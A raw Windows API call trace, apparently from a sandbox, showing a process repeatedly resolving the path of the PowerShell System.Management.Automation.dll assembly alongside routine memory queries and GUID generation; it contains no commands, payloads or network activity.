	[0226.699] VirtualQuery (in: lpAddress=0x29cda0, lpBuffer=0x29dda0, dwLength=0x1c | out: lpBuffer=0x29dda0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.699] GetLastError () returned 0x0
	[0226.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.700] GetLastError () returned 0x0
	[0226.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.716] GetLastError () returned 0x0
	[0226.716] VirtualQuery (in: lpAddress=0x29ce6c, lpBuffer=0x29de6c, dwLength=0x1c | out: lpBuffer=0x29de6c*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.717] GetLastError () returned 0x0
	[0226.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.717] GetLastError () returned 0x0
	[0226.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.717] GetLastError () returned 0x0
	[0226.718] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x25cd1d17, Data2=0xe41a, Data3=0x412c, Data4=([0]=0xaf, [1]=0xa7, [2]=0xdc, [3]=0xf2, [4]=0x2, [5]=0xd3, [6]=0xce, [7]=0xe6))) returned 0x0
	[0226.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.718] GetLastError () returned 0x0
	[0226.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.718] GetLastError () returned 0x0
	[0226.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.718] GetLastError () returned 0x0
	[0226.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.718] GetLastError () returned 0x0
	[0226.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.719] GetLastError () returned 0x0
	[0226.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.719] GetLastError () returned 0x0
	[0226.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.719] GetLastError () returned 0x0
	[0226.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.719] GetLastError () returned 0x0
	[0226.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.719] GetLastError () returned 0x0
	[0226.720] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x614cbba9, Data2=0x285c, Data3=0x4f78, Data4=([0]=0x83, [1]=0x98, [2]=0xa7, [3]=0x30, [4]=0x95, [5]=0x9f, [6]=0x97, [7]=0x18))) returned 0x0
	[0226.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.720] GetLastError () returned 0x0
	[0226.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.720] GetLastError () returned 0x0
	[0226.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.720] GetLastError () returned 0x0
	[0226.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.721] GetLastError () returned 0x0
	[0226.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.721] GetLastError () returned 0x0
	[0226.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.721] GetLastError () returned 0x0
	[0226.721] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xb9999fc3, Data2=0xaa6e, Data3=0x4283, Data4=([0]=0x91, [1]=0xc4, [2]=0x7a, [3]=0xac, [4]=0x96, [5]=0x37, [6]=0x9b, [7]=0x14))) returned 0x0
	[0226.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.721] GetLastError () returned 0x0
	[0226.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.722] GetLastError () returned 0x0
	[0226.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.722] GetLastError () returned 0x0
	[0226.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.722] GetLastError () returned 0x0
	[0226.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.722] GetLastError () returned 0x0
	[0226.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.722] GetLastError () returned 0x0
	[0226.723] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x53ca5a72, Data2=0xea27, Data3=0x4c45, Data4=([0]=0xa6, [1]=0x3d, [2]=0x8e, [3]=0xf0, [4]=0xdc, [5]=0x6e, [6]=0x8f, [7]=0x4d))) returned 0x0
	[0226.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.723] GetLastError () returned 0x0
	[0226.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.723] GetLastError () returned 0x0
	[0226.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.723] GetLastError () returned 0x0
	[0226.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.724] GetLastError () returned 0x0
	[0226.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.724] GetLastError () returned 0x0
	[0226.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.724] GetLastError () returned 0x0
	[0226.724] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x1b87e28, Data2=0x2929, Data3=0x4bb5, Data4=([0]=0xb7, [1]=0x45, [2]=0x49, [3]=0x95, [4]=0x60, [5]=0x95, [6]=0x59, [7]=0x9f))) returned 0x0
	[0226.725] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xc4a47e52, Data2=0xdf77, Data3=0x44fd, Data4=([0]=0x91, [1]=0x7f, [2]=0xe3, [3]=0xdc, [4]=0xbf, [5]=0xf0, [6]=0x38, [7]=0xb4))) returned 0x0
	[0226.725] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xbc0755d6, Data2=0xe9f7, Data3=0x45ff, Data4=([0]=0x89, [1]=0xd8, [2]=0x49, [3]=0xaa, [4]=0xe2, [5]=0x12, [6]=0x28, [7]=0x3f))) returned 0x0
	[0226.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.725] GetLastError () returned 0x0
	[0226.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.726] GetLastError () returned 0x0
	[0226.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.726] GetLastError () returned 0x0
	[0226.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.726] GetLastError () returned 0x0
	[0226.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.726] GetLastError () returned 0x0
	[0226.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.726] GetLastError () returned 0x0
	[0226.726] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd671bcaf, Data2=0x29a0, Data3=0x4d05, Data4=([0]=0xa5, [1]=0x33, [2]=0xfe, [3]=0xf1, [4]=0xb9, [5]=0xae, [6]=0x9c, [7]=0x82))) returned 0x0
	[0226.727] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.727] GetLastError () returned 0x0
	[0226.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.727] GetLastError () returned 0x0
	[0226.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.727] GetLastError () returned 0x0
	[0226.728] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.728] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.728] GetLastError () returned 0x0
	[0226.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.728] GetLastError () returned 0x0
	[0226.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.729] GetLastError () returned 0x0
	[0226.729] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.729] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.730] GetLastError () returned 0x0
	[0226.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.730] GetLastError () returned 0x0
	[0226.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.730] GetLastError () returned 0x0
	[0226.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.730] GetLastError () returned 0x0
	[0226.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.730] GetLastError () returned 0x0
	[0226.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.730] GetLastError () returned 0x0
	[0226.731] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.731] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
